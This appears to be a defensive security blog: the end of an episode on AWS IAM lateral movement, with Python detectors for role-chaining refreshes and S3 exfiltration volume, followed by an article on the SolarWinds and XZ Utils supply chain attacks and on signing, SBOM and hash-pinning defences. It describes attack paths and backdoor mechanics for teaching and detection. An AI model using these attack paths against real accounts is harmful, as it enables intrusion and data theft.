ExternalId doesn’t protect you if the source account is compromised. The attacker who holds the dev Lambda’s execution role credentials also has access to the Lambda’s environment variables and source code — where the ExternalId value is likely stored. ExternalId is not a secret the attacker can’t reach; it is a value the legitimate caller passes to prove it initiated the request. Scope the principal ARN first; add ExternalId as a second layer.

Access Analyzer only catches public and cross-account access, not intra-account lateral movement. If the attacker is already operating inside the same account as the target role, Access Analyzer does not flag the trust relationship. Intra-account over-broad trust policies require IAM policy analysis tooling (Cloudsplaining, Prowler) to surface — Access Analyzer won’t show them.

Role chaining resets the session clock but the window is still one hour. AssumeRole sessions default to one hour, and a session obtained through role chaining is capped at one hour even if the role allows a longer maximum duration. An attacker doing role chaining gets a fresh one-hour window at each hop. Persistent access requires refreshing before expiry, which means repeated AssumeRole calls in CloudTrail that form a detectable pattern if you’re querying for it.
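The refresh pattern can be surfaced by counting how often one role’s sessions assume the same target. A minimal Python sketch over parsed CloudTrail events; the threshold of three and the function name are assumptions to tune against your own baseline.

```python
from collections import Counter


def repeated_assumptions(events: list, threshold: int = 3) -> dict:
    """Count AssumeRole calls per (caller role, target role) pair and
    return the pairs seen at least `threshold` times."""
    counts = Counter()
    for event in events:
        if event.get("eventName") != "AssumeRole":
            continue
        caller = (event.get("userIdentity") or {}).get("arn") or ""
        target = (event.get("requestParameters") or {}).get("roleArn") or ""
        if ":assumed-role/" not in caller or not target:
            continue  # only role-to-role hops count as chaining
        # Drop the session name so refreshed sessions of one role group together
        caller_role = caller.rsplit("/", 1)[0]
        counts[(caller_role, target)] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


chain_events = [
    {
        "eventName": "AssumeRole",
        "userIdentity": {
            "arn": f"arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-{i}"
        },
        "requestParameters": {
            "roleArn": "arn:aws:iam::222222222222:role/analytics-admin"
        },
    }
    for i in range(3)
]
print(repeated_assumptions(chain_events))
```

Legitimate automation also refreshes sessions on a schedule, so the useful signal is a pair that is new, or a refresh cadence that differs from the workload’s normal one.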

S3 exfiltration may not trigger GuardDuty immediately. GuardDuty’s Exfiltration:S3/AnomalousBehavior finding (the successor to the retired Exfiltration:S3/ObjectRead.Unusual) is built on a behavior baseline. A new attacker session has no baseline of its own, so the first data exfiltration may not fire the finding if the volume appears “normal” relative to what GuardDuty has seen from that role before. CloudTrail GetObject events are the more reliable signal, provided S3 data events are enabled on the trail (they are off by default); don’t rely on GuardDuty alone for S3 exfiltration detection.
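A simple volume check over GetObject data events can fill that gap. This is a minimal Python sketch. It assumes S3 data events are enabled and that each event carries additionalEventData.bytesTransferredOut; confirm that field in your own logs before relying on it. The function name is illustrative.

```python
from collections import defaultdict


def bytes_read_per_identity(events: list) -> dict:
    """Sum the bytes returned by S3 GetObject calls, grouped by caller ARN."""
    totals = defaultdict(int)
    for event in events:
        if event.get("eventSource") != "s3.amazonaws.com":
            continue
        if event.get("eventName") != "GetObject":
            continue
        arn = (event.get("userIdentity") or {}).get("arn") or "unknown"
        extra = event.get("additionalEventData") or {}
        # Assumed field; float() tolerates values serialized as 15728640.0
        totals[arn] += int(float(extra.get("bytesTransferredOut", 0)))
    return dict(totals)


session = "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
s3_events = [
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"arn": session},
     "additionalEventData": {"bytesTransferredOut": 15728640}},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"arn": session},
     "additionalEventData": {"bytesTransferredOut": 8388608}},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListObjectsV2",
     "userIdentity": {"arn": session}},
]
print(bytes_read_per_identity(s3_events))
```

Comparing each session’s total against a fixed ceiling, or against the same role’s history, gives an alert that does not depend on a learned baseline.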

arn:aws:iam::ACCOUNT:root in a trust policy does not mean the root user specifically. This is a common misread. arn:aws:iam::123456789012:root means the account as a whole: any IAM user, role, or federated session in account 123456789012 whose own identity policy allows sts:AssumeRole on the target can use the trust. It is the account-level wildcard, which is exactly why it’s dangerous in a cross-account trust policy.

Quick Reference

Lateral Movement Technique	CloudTrail Signal	Detection Tool	Structural Fix
Cross-account `sts:AssumeRole`	`AssumeRole` where source accountId ≠ target accountId in role ARN	CloudTrail + Athena query	Scope Principal to specific role ARN
Account root as trust principal	Access Analyzer ACTIVE finding on IAM Role	AWS Access Analyzer	Replace `root` with specific ARN + ExternalId
Role chaining across accounts	Multiple sequential `AssumeRole` events, each with new session token	CloudTrail session correlation	SCP restricting cross-account assumptions to approved pairs
Exfiltration via assumed prod role	S3 `GetObject`/`ListBucket` from assumed-role session in CloudTrail (requires S3 data events)	CloudTrail + GuardDuty `Exfiltration:S3/AnomalousBehavior`	Least-privilege S3 policy on prod role + S3 Access Logs
IAM enumeration from compromised identity	`iam:ListRoles`, `iam:GetRole`, `iam:SimulatePrincipalPolicy`	GuardDuty `Discovery:IAMUser/AnomalousBehavior`	Deny `iam:*` on Lambda execution roles
Secrets Manager access via assumed role	`secretsmanager:GetSecretValue` from unexpected principal	CloudTrail resource policy audit	Attach resource policy to secrets scoping allowed principals

Key Takeaways

Cloud lateral movement IAM chains are not exploits — they are valid API calls that execute because someone wrote a trust policy that was too broad; the fix is always in the trust policy, not in the network
Every cross-account trust policy that uses arn:aws:iam::ACCOUNT:root as the principal is an open door for any compromised identity in that account. Scope it to the specific role ARN before an attacker finds it
CloudTrail AssumeRole events where the principal’s account ID doesn’t match the target role’s account ID are the detection signal; run the Athena query in your environment this week and look at what comes back
AWS Access Analyzer with an organization-level analyzer surfaces the vulnerable trust policies automatically — if you’re not running it, you’re auditing trust policies manually or not at all
IAM privilege escalation paths and cross-account lateral movement compound: an attacker who escalates privilege inside a source account has more roles to attempt cross-account assumptions from, extending the blast radius further
Defense in depth requires all three layers: scoped trust policy principal, ExternalId condition, and an SCP restricting cross-account assumptions to approved accounts. Any single layer has a bypass

What’s Next

EP11 is where the series pivots from attack paths to detection engineering. We’ve covered how attackers compromise identities, escalate privilege, move laterally through cloud accounts, and exfiltrate data. EP11 asks a harder question: how do you build detection rules that catch these techniques at the kernel level — before the attack completes, not after it shows up in CloudTrail?

The answer involves eBPF: kernel-level visibility that gives you process execution context, network connections, and file system access in real time, mapped to the cloud workload identity making the API calls. A SIEM ingesting CloudTrail logs sees what happened after the fact. eBPF running on the node sees the aws sts assume-role subprocess spawn, the credential file write, and the outbound S3 connection — while it’s happening.


Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense

June 30, 2026 by Vamshi Krishna Santhapuri

Reading Time: 14 minutes

TL;DR

Supply chain attacks map to OWASP A06 + A08: attackers compromise the software build or distribution chain so that legitimate, signed artifacts deliver malicious payloads, and standard vulnerability scanning misses this entirely
SolarWinds (disclosed December 2020): threat actors gained access to the SolarWinds environment in September 2019, inserted the SUNBURST backdoor into the Orion build in February 2020, and shipped it in digitally signed updates from March 2020. It went undetected for roughly nine months and reached 18,000+ organizations including the U.S. Treasury, DHS, and DoD
XZ Utils (CVE-2024-3094, March 2024): the “Jia Tan” persona spent two years building open-source credibility before inserting a backdoor into releases 5.6.0 and 5.6.1. The obfuscated payload sat in binary test files in the git repo, but the build script that activated it shipped only in the distributed tarball (release tarball = the compressed archive that Linux distributions download to build the package, separate from the git source tree)
The XZ backdoor targeted liblzma, which is linked into sshd via systemd on affected distros — a compromised SSH daemon on every major Linux distribution was days away from shipping
Detection relied on human observation: Andres Freund noticed SSH logins taking about 500ms longer during unrelated benchmarking, profiled sshd, and found unexplained CPU time inside liblzma
The structural fix is a pipeline: pin dependencies with hashes + private artifact registry + SBOM generation + image signing with Sigstore/cosign — each layer catches a different attack class

OWASP Mapping: A06 Vulnerable and Outdated Components — compromised upstream dependencies. A08 Software and Data Integrity Failures — build artifacts not signed or verified; release tarball content not validated against source.

The Big Picture

┌──────────────────────────────────────────────────────────────────────────┐
│                  SUPPLY CHAIN ATTACK SURFACE                             │
│                                                                          │
│   SOURCE REPO          BUILD SYSTEM         ARTIFACT REGISTRY           │
│   github.com/org  ──▶  CI/CD pipeline  ──▶  container registry / PyPI  │
│        │                    │                      │                     │
│        │                    │                      │                     │
│   ATTACK POINT 1:      ATTACK POINT 2:       ATTACK POINT 3:            │
│   Social engineer      Compromise the        Typosquatting /             │
│   maintainer trust     build host            dependency confusion        │
│   (XZ model)           (SolarWinds model)    (public registry model)    │
│        │                    │                      │                     │
│        └────────────────────┴──────────────────────┘                    │
│                             │                                            │
│                    COMPROMISED ARTIFACT                                  │
│             (signed, valid, ships with legitimate release)               │
│                             │                                            │
│                             ▼                                            │
│        PRODUCTION SYSTEMS (18,000 orgs / every major Linux distro)      │
│                                                                          │
│   ═══════════════════════════════════════════════════════════════        │
│   DETECTION PIPELINE                                                     │
│   Hash pinning + SBOM + Sigstore verify + tarball ≠ git diff check      │
│   Each layer catches a different attack class                            │
└──────────────────────────────────────────────────────────────────────────┘

Supply chain attack detection is hard because the artifact being delivered is legitimate by every traditional check: it is signed by the vendor, it passes antivirus, it resolves from the correct registry. The attack happened before the artifact was packaged, inside the trust chain you already approved. SolarWinds and XZ Utils are not anomalies — they are the template.

Two Incidents — Same Attack Surface

SolarWinds (December 2020)

The SolarWinds compromise is the definitive build-system attack. The timeline:

September 2019   Threat actor (UNC2452 / Cozy Bear) gains access to
                 SolarWinds build environment and begins test injections

February 2020    SUNBURST backdoor code inserted into SolarWinds Orion
                 build process, not into the source repository

March 2020       First SUNBURST build ships. Orion 2019.4 HF 5 through
                 2020.2.1 are affected; binaries digitally signed by
                 SolarWinds with their valid code-signing certificate

March–           SUNBURST distributed to ~18,000 customers via the
December 2020    legitimate Orion software update mechanism

December 2020    FireEye detects SUNBURST while investigating their own
                 breach and reports to SolarWinds and CISA

What made detection almost impossible:

The compiled binary passed every integrity check a customer would run. It was signed with SolarWinds’ legitimate certificate. It installed via the normal software update channel. The SUNBURST code itself was designed for low observability: it stayed dormant for 12–14 days after installation, shaped its traffic to resemble normal Orion telemetry, and ran command-and-control through an attacker-registered domain (avsvmcloud.com) hosted on mainstream cloud provider IPs.

The C2 communication was disguised as standard Orion telemetry. Exfiltration was slow — the attackers were not bulk-extracting data, they were selecting targets and moving laterally only inside high-value organizations.

The attack vector was the build system, not source code. SolarWinds source repositories did not contain SUNBURST. The attacker modified the compiled output at build time. A code review of the SolarWinds source would have found nothing.

XZ Utils (CVE-2024-3094, March 2024)

The XZ Utils compromise is more instructive because it was social engineering at the package maintainer level, caught before it shipped widely — and the catch was accidental.

Timeline:

November 2021    GitHub user "Jia Tan" (JiaT75) makes first commit to
                 xz-utils repository

2022–2023        Jia Tan steadily contributes quality patches to xz-utils
                 while sock-puppet accounts pressure maintainer Lasse
                 Collin to add a co-maintainer; Jia Tan is eventually
                 granted commit access

Early 2024       Jia Tan accelerates commit activity; further fake
                 personas push distributions to adopt the new releases
                 quickly

February 2024    Jia Tan releases xz 5.6.0 — backdoor code inserted in
                 the release tarball build process (not in git commits)

March 9, 2024    xz 5.6.1 released with minor obfuscation changes

March 28–29,     Andres Freund (PostgreSQL/Microsoft engineer) notices
2024             sshd logins taking about 500ms longer and using unusual
                 CPU on his Debian sid machine during unrelated benchmarking

March 29, 2024   Freund profiles sshd, finds unexplained CPU time inside
                 liblzma, and reports to the oss-security mailing list.
                 CISA publishes an advisory the same day.

At disclosure    Fedora 40 beta, Debian unstable, and openSUSE Tumbleweed
                 had all shipped the affected version. Ubuntu 24.04 LTS
                 was in freeze and had it staged.

What was backdoored and how:

xz-utils provides the liblzma compression library. On distributions that patch OpenSSH for systemd notification (Debian and Fedora among them), sshd links against libsystemd, which links against liblzma. The backdoor hooked into sshd’s RSA key processing, specifically RSA_public_decrypt, so that the holder of a specific attacker-controlled private key could bypass authentication.

The backdoor was not in the git repository. It was injected during the tarball release process via obfuscated test files in the repository that were assembled and compiled during the build. Comparing the released tarball to the git tree reveals extra files and code that do not appear in any git commit:

xz --version
# 5.6.0 or 5.6.1 = affected; 5.4.x = safe

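# How Andres Freund found it (illustrative commands, not his exact session)
# He was micro-benchmarking and noticed sshd burning CPU during logins
perf record -g -p "$(pgrep -o sshd)" -- sleep 30
perf report --sort dso | head -20
# A profile dominated by liblzma is the anomaly:
# sshd has no reason to spend login time inside a compression library
# (strace would not show this: it traces syscalls, not library calls)

# Verify tarball vs git tag (the forensic check)
# If you have both the tarball and git source:
tar xf xz-5.6.1.tar.gz
git clone https://github.com/tukaani-project/xz.git xz-git
git -C xz-git checkout v5.6.1
diff -r --exclude=.git xz-5.6.1/ xz-git/
# Release tarballs legitimately add autotools output (configure, Makefile.in),
# so review every extra or changed file. In 5.6.x the malicious piece was
# m4/build-to-host.m4, whose tarball content matches no git commit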
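
The tarball-versus-git comparison can also be scripted so it runs on every package intake. A minimal sketch, assuming both trees are already unpacked on disk; the function names are hypothetical, and the result still needs human review because release tarballs legitimately contain generated files:

```python
import hashlib
import os


def file_digests(root, skip_dirs=(".git",)):
    """Map each relative file path under root to its SHA-256 hex digest."""
    digests = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune directories that should never be compared (git metadata).
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not os.path.isfile(full):
                continue  # skip broken symlinks and special files
            rel = os.path.relpath(full, root)
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare_trees(tarball_dir, git_dir):
    """Return (only_in_tarball, changed) as sorted lists of relative paths."""
    tar_files = file_digests(tarball_dir)
    git_files = file_digests(git_dir)
    only_in_tarball = sorted(set(tar_files) - set(git_files))
    changed = sorted(
        path for path in tar_files.keys() & git_files.keys()
        if tar_files[path] != git_files[path]
    )
    return only_in_tarball, changed
```

Calling compare_trees("xz-5.6.1", "xz-git") returns the files that exist only in the tarball and the files whose content differs from the git checkout. Both lists are review queues, not verdicts.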

What makes this attack class so dangerous:

The actor ran a multi-year operation. Two years of legitimate contributions, relationship-building with maintainers, and social pressure coordination across multiple fake personas. The code quality was good — Jia Tan’s legitimate commits improved xz-utils. The backdoor code was technically sophisticated enough that it took days of analysis to fully reverse-engineer after Freund’s discovery.

Red Phase: How Supply Chain Attacks Work in Practice

There are three distinct attack surfaces. They require different defenses and catch different attack classes.

1. Build System Compromise (SolarWinds Model)

The attacker gains access to the CI/CD or build host and modifies compiled artifacts. The source code is clean. Git history is clean. Only the build output is poisoned.

What makes it hard to catch: legitimate signing certificate, normal distribution channel, artifact passes all integrity checks that consumers run.

Provenance checks (read-only, safe to run against your own artifacts):

# Understand your build artifact's provenance
# Can you trace a production binary back to a specific source commit?

# For a Docker image: inspect build metadata
docker inspect your-org/your-image:latest | \
  jq '.[0].Config.Labels'
# Look for: org.opencontainers.image.revision (git SHA)
#           org.opencontainers.image.source (repo URL)
# If these labels are absent, you cannot verify what source built this image

# For a Go binary: read embedded build info
go version -m /path/to/binary
# Shows: Go version, module path, dependencies with versions and hashes
# The VCS revision is embedded only when the build ran inside a repository
# with -buildvcs enabled (default in Go 1.18+); -trimpath removes local paths

# Check if a container image was built from a known CI workflow
# (assumes SLSA provenance attestation is present)
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp="^https://github.com/your-org/your-repo/" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.buildType'
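
The jq pipeline above decodes a base64 payload inside the attestation envelope. The same decoding can be sketched in Python for use in an audit script. This assumes the envelope carries an in-toto statement with SLSA provenance in either the v0.2 or v1 layout; the function names are hypothetical, and decoding alone verifies nothing (signature verification remains cosign's job):

```python
import base64
import json


def decode_statement(envelope_json):
    """Decode the base64 in-toto statement carried in an attestation envelope."""
    envelope = json.loads(envelope_json)
    return json.loads(base64.b64decode(envelope["payload"]))


def provenance_summary(statement):
    """Extract build type and builder id from SLSA v0.2 or v1 provenance."""
    pred = statement.get("predicate", {})
    if "buildDefinition" in pred:  # SLSA v1 layout
        return {
            "buildType": pred["buildDefinition"].get("buildType"),
            "builder": pred.get("runDetails", {}).get("builder", {}).get("id"),
        }
    return {  # SLSA v0.2 layout
        "buildType": pred.get("buildType"),
        "builder": pred.get("builder", {}).get("id"),
    }
```

A policy check would then compare the builder value against the one build platform you expect, and reject anything else.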

2. Dependency Hijacking: Typosquatting and Dependency Confusion

Typosquatting: a malicious package on PyPI/npm with a name close to a popular package (requets vs requests, djano vs django). Developers with a typo in their requirements.txt install the malicious package.

Dependency confusion: a private internal package (mycompany-utils) has the same name as a package an attacker uploads to the public registry with a higher version number. Package managers that consult both registries and pick the highest version, or that check the public registry first, will resolve the public (malicious) version.

# Test for dependency confusion: can your private package names be
# resolved from the public registry?
# Do this in a throwaway environment, NOT production

# For Python: check if your internal package name exists on PyPI
pip index versions your-internal-package-name 2>/dev/null
# If it returns versions and you didn't publish it there = confusion risk

# For npm: check whether your internal package name exists on the public registry
npm view your-internal-package-name version 2>/dev/null
# An unscoped internal name with a public registry hit = confusion risk
# Scoped names (@your-scope/pkg) are safe only if you own that scope publicly

# For pip: audit your requirements for known-vulnerable packages
pip-audit --requirement requirements.txt
# pip-audit queries the PyPI advisory database by default (use -s osv for OSV)
# Install: pip install pip-audit

# For npm: audit for both vulnerabilities and signature issues
npm audit
npm audit signatures
# 'npm audit signatures' verifies that packages in node_modules were
# signed with registry-issued keys — catches tampered downloads
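
Typosquats can be flagged before install by comparing requested names against the packages you actually intend to use. A minimal sketch using Python's difflib; the POPULAR list and the 0.8 cutoff are illustrative assumptions, not a vetted dataset:

```python
import difflib

# Illustrative allowlist; in practice, load the names your organization approves.
POPULAR = ["requests", "django", "numpy", "flask", "urllib3"]


def lookalikes(name, known=POPULAR, cutoff=0.8):
    """Return known names that `name` closely resembles but does not equal."""
    name = name.lower()
    if name in known:
        return []  # exact match: this is the real package name
    return difflib.get_close_matches(name, known, n=3, cutoff=cutoff)
```

Here lookalikes("requets") returns ["requests"], while an exact or unrelated name returns an empty list. A non-empty result is a prompt to check the spelling in requirements.txt, not proof of malice.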

3. Maintainer Compromise (XZ Model)

The hardest attack class to detect from the outside. A trusted maintainer is either compromised or is the attacker. Their commits are signed, their track record is legitimate, the package comes from the canonical repository.

What you can check:

# Verify a PyPI package hash matches what's listed in the index
# The hash listed on PyPI is set at upload time — if the file was
# replaced after upload, the hash would change (PyPI prevents this,
# but private/mirror registries may not)
pip download requests==2.31.0 --no-deps --dest /tmp/pkg-check/
sha256sum /tmp/pkg-check/requests-2.31.0-py3-none-any.whl
# Compare to the hash shown at pypi.org/project/requests/2.31.0/#files

# Check npm package signatures (post-XZ hygiene)
npm audit signatures
# Output shows: verified (good), missing (not signed), invalid (tampered)

# For containers: verify Sigstore signature
cosign verify \
  --certificate-identity-regexp="^https://github.com/your-org/your-repo/" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest
# If this fails: the image was not built by the expected GitHub Actions workflow
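
The manual sha256sum comparison above is easy to automate for mirrors and private registries. A minimal sketch, assuming you have the expected digest from a trusted source such as the index page or a lock file; the function names are hypothetical:

```python
import hashlib
import hmac


def sha256_file(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large artifacts do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_expected(path, expected_hex):
    """True when the file's SHA-256 equals the expected hex digest."""
    return hmac.compare_digest(sha256_file(path), expected_hex.strip().lower())
```

A False result for a file pulled from a mirror means the mirror served different bytes than the upstream index recorded, which is the condition worth alerting on.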

Blue Phase: Detection

SLSA: What Level Your Pipeline Should Be At

SLSA (Supply chain Levels for Software Artifacts) is a framework for build pipeline integrity. SLSA v1.0 defines three Build track levels:

SLSA Level 1  Build process is scripted/automated, produces provenance
              Most teams can reach this today
              Catches: accidental modifications, basic auditability

SLSA Level 2  Build runs on a hosted build platform
              (GitHub Actions, GitLab CI); provenance is signed by the
              build platform, not just the developer
              Catches: developer workstation compromise

SLSA Level 3  Hardened build platform: builds are isolated from one
              another and signing keys are out of reach of user-defined
              build steps, so provenance is non-forgeable
              Catches: cross-build contamination, most CI/CD attacks

SLSA Level 4  (defined in v0.1 with hermetic and reproducible builds;
              not part of SLSA v1.0)

Most teams should target SLSA Level 2 now, Level 3 within 6 months.
Level 3, combined with hermetic build steps, is where SolarWinds-class
attacks become detectable.

Container Image Signing with Sigstore/cosign

# Sign a container image after build (in CI, using OIDC — no stored key)
# This runs inside GitHub Actions after the docker push step
cosign sign \
  --yes \
  ghcr.io/your-org/your-image:${GITHUB_SHA}
# cosign uses the GitHub Actions OIDC token to sign — no private key needed
# The signature is stored in the registry alongside the image

# Verify the signature and check the certificate claims
cosign verify \
  --certificate-identity="https://github.com/your-org/your-repo/.github/workflows/build.yml@refs/heads/main" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq '.[0] | {
    issuer: .optional.Issuer,
    workflow: .optional.BuildSignerURI,
    repo: .optional.SourceRepositoryURI,
    ref: .optional.SourceRepositoryRef
  }'
# A passing verification means:
# - Image was built by a specific GitHub Actions workflow
# - In a specific repository, on a specific branch
# - At a specific time (cert has a 10-minute TTL)

SBOM Generation and Vulnerability Scanning

An SBOM (Software Bill of Materials) enumerates every component in a software artifact. Without an SBOM, you cannot answer “are we affected by the XZ backdoor?” across your fleet in under an hour.

# Generate an SBOM for a container image using syft
syft your-org/your-image:latest -o cyclonedx-json > sbom.json
# syft walks the image layers and catalogs every package,
# including OS packages (rpm/deb), language packages (pip/npm/go),
# and their versions

# Inspect what syft found
cat sbom.json | jq '.components[] | select(.name == "xz-libs") | {name, version, purl}'
# Example output:
# {
#   "name": "xz-libs",
#   "version": "5.4.4-1.el9",    ← 5.4.x = safe; 5.6.0/5.6.1 = backdoored
#   "purl": "pkg:rpm/redhat/xz-libs@5.4.4-1.el9?arch=x86_64"
# }

# Scan the SBOM for known vulnerabilities
grype sbom:./sbom.json
# grype checks each component against Grype's vulnerability database
# (CVE, GHSA, OSV) — would have flagged CVE-2024-3094 once published

# Automate: generate SBOM and scan in CI, fail build if critical CVEs found
grype sbom:./sbom.json --fail-on critical
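
The XZ question can also be answered directly from the SBOM without waiting for a vulnerability database update. A minimal sketch, assuming a CycloneDX JSON document already parsed into a dict; the package-name set is an assumption that covers common rpm and deb names and may need extending for your distributions:

```python
import re

# Upstream versions 5.6.0 and 5.6.1, with an optional Debian-style epoch prefix.
AFFECTED = re.compile(r"^(?:\d+:)?5\.6\.[01](?!\d)")
# Assumed package names for xz and liblzma across common distributions.
XZ_NAMES = {"xz", "xz-libs", "xz-utils", "liblzma", "liblzma5"}


def affected_components(sbom):
    """Return (name, version) pairs for xz packages at a backdoored version."""
    hits = []
    for comp in sbom.get("components", []):
        name = comp.get("name", "")
        version = comp.get("version", "")
        # Debian's rollback was versioned 5.6.1+really5.4.5, which is safe.
        if name in XZ_NAMES and AFFECTED.match(version) and "+really" not in version:
            hits.append((name, version))
    return hits
```

Load sbom.json with json.load and pass the result in. An empty list means no component matched the assumed names at an affected version; it does not cover statically linked copies that syft could not catalog.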

Build Provenance with GitHub Actions (SLSA Level 2/3)

# .github/workflows/build.yml
# Adds SLSA provenance attestation to every release artifact
name: Build and attest

on:
  push:
    tags: ["v*"]

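permissions:
  contents: read
  packages: write       # Required to push the image to ghcr.io
  id-token: write       # Required for OIDC signing
  attestations: write   # Required for GitHub attestation API

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image-digest: ${{ steps.push.outputs.digest }}
    steps:
      - uses: actions/checkout@v4

      # Without a registry login the push step below fails
      - name: Log in to GitHub Container Registry
        uses: docker/login-action@v3
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}

      - name: Build and push container image
        id: push
        uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:${{ github.ref_name }}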

      - name: Generate SLSA provenance attestation
        uses: actions/attest-build-provenance@v1
        with:
          subject-name: ghcr.io/${{ github.repository }}
          subject-digest: ${{ steps.push.outputs.digest }}
          push-to-registry: true
          # This generates a signed SLSA provenance statement that records:
          # - Which workflow built this artifact
          # - The git SHA it was built from
          # - The trigger event
          # Stored alongside the image in the registry

# Verify the attestation against an image
gh attestation verify \
  oci://ghcr.io/your-org/your-image:latest \
  --owner your-org
# Passes: image provenance is traceable to a specific workflow run
# Fails: image was built and pushed outside any attested workflow

What Anomaly Detection Catches

Sigstore and SBOM scanning catch known-bad artifacts. Anomaly detection catches behavior that hasn’t been classified yet:

Unexpected external connections during build: a hermetic build should make zero network calls after dependency fetch. Any egress during the build phase is a signal — a compromised build tool phoning home, a dependency pulling a secondary payload at install time
Artifact hash drift: if the same source commit produces different binary output on two consecutive builds, the build environment is non-deterministic at best, compromised at worst. Reproducible builds produce identical byte-for-byte output from identical inputs — hash drift indicates something in the build environment changed
New dependency additions without PR: any dependency that appears in a build artifact but was not added via a reviewed pull request is an anomaly. SBOMs make this comparison possible; without them it is invisible

# Check for unexpected network connections during a build
# Run this on the build host during a CI job
ss -tnp | grep -E "(ESTAB|SYN-SENT)"
# ss prints states as ESTAB and SYN-SENT (ESTABLISHED and SYN_SENT are netstat spellings)
# Any connection to an IP outside your artifact registry and SCM = investigate

# Compare artifact hashes across two builds of the same commit
# (tests build reproducibility)
docker pull ghcr.io/your-org/your-image@sha256:<first-build-digest>
docker pull ghcr.io/your-org/your-image@sha256:<second-build-digest>
# If the digests differ for the same source commit, investigate
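
The "new dependency without PR" check reduces to a set difference between the SBOM of the last reviewed build and the SBOM of the current one. A minimal sketch, assuming two CycloneDX documents already parsed into dicts; the function names are hypothetical:

```python
def component_set(sbom):
    """Collect (name, version) pairs from a CycloneDX-style SBOM dict."""
    return {
        (comp.get("name"), comp.get("version"))
        for comp in sbom.get("components", [])
    }


def new_components(previous_sbom, current_sbom):
    """Return components present in the current build but not the previous one."""
    return sorted(component_set(current_sbom) - component_set(previous_sbom))
```

Each returned pair should map to a reviewed pull request that added or upgraded it. Anything that does not is the anomaly.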

Purple Phase: Structural Fixes

1. Pin Dependencies with Hashes — Not Just Versions

Version pinning (requests==2.31.0) pins the version number. The package maintainer can yank and re-upload that version with different content on some registries. Hash pinning locks the exact file bytes:

# requirements.txt — hash-pinned
requests==2.31.0 \
    --hash=sha256:58cd2187423839e4e2d07f6f16c9cd680e74d6066237a4e1e88f06fc4a3e2e56 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Two hashes because the package ships both a wheel and a source tarball
# pip verifies the downloaded file matches one of these hashes before installing

# Generate hash-pinned requirements from requirements.in (pip install pip-tools)
pip-compile --generate-hashes requirements.in --output-file requirements.txt
# pip-compile resolves the full dependency tree and writes pinned+hashed output
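
Hash pinning only helps if every entry is pinned, so a CI lint for missing hashes is worth having. A minimal sketch that handles backslash line continuations; the function name is hypothetical, and pip's own --require-hashes flag remains the enforcement mechanism at install time:

```python
def unhashed_requirements(text):
    """Return requirement specifiers in a requirements file that lack --hash."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "  # join continuation lines into one entry
            continue
        logical.append((buf + line).strip())
        buf = ""
    if buf.strip():
        logical.append(buf.strip())

    missing = []
    for entry in logical:
        # Skip blanks, comments, and option lines such as --index-url.
        if not entry or entry.startswith("#") or entry.startswith("-"):
            continue
        if "--hash=" not in entry:
            missing.append(entry.split()[0])
    return missing
```

Failing the build when this returns a non-empty list keeps a single unpinned line from quietly weakening the whole file.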

For containers, pin base images by digest, not by tag:

# Vulnerable: mutable tag
FROM python:3.11-slim

# Secure: pinned digest
FROM python:3.11-slim@sha256:6a37af1bde8be89040f70b9e93f2f61b5f14e99d7e49f9ea3dc7ded2e1c82f7b
# The digest is immutable — this exact image layer will always be fetched,
# regardless of what the 3.11-slim tag points to in the future
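
Digest pinning can be enforced with a small Dockerfile lint. A minimal sketch, assuming plain FROM lines; base images supplied through ARG substitution would be reported as unpinned and need manual review, and the function name is hypothetical:

```python
import re

FROM_RE = re.compile(r"^\s*FROM\s+(?:--platform=\S+\s+)?(\S+)", re.IGNORECASE)
ALIAS_RE = re.compile(r"\s+AS\s+(\S+)", re.IGNORECASE)


def unpinned_base_images(dockerfile_text):
    """Return FROM images that are not pinned by sha256 digest."""
    stages, unpinned = set(), []
    for line in dockerfile_text.splitlines():
        match = FROM_RE.match(line)
        if not match:
            continue
        image = match.group(1)
        # Earlier build stages and the empty scratch image need no digest.
        is_local = image in stages or image.lower() == "scratch"
        if not is_local and "@sha256:" not in image:
            unpinned.append(image)
        alias = ALIAS_RE.search(line)
        if alias:
            stages.add(alias.group(1))
    return unpinned
```

Run it over every Dockerfile in the repository and fail the pipeline on a non-empty result.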

2. Private Artifact Registry — No Direct PyPI or npm in Production CI

A private registry (Artifactory, Nexus, AWS CodeArtifact, Google Artifact Registry) proxies upstream registries and caches approved packages. Benefits:

Dependency confusion protection: your CI resolves mycompany-utils from your private registry first, never from public PyPI
Availability independence: a PyPI outage does not break your builds
Audit trail: every package version pulled in every build is logged
Policy enforcement: you can block packages with unacceptable licenses or CVE scores

# Configure pip to use a private registry proxy exclusively
# In ci/pip.conf or as environment variable
export PIP_INDEX_URL="https://your-artifactory.company.com/artifactory/api/pypi/pypi-virtual/simple/"
# Do not set PIP_TRUSTED_HOST: it tells pip to accept that host without valid HTTPS
# No direct PyPI access: all packages go through your registry proxy

# For npm: configure registry in .npmrc
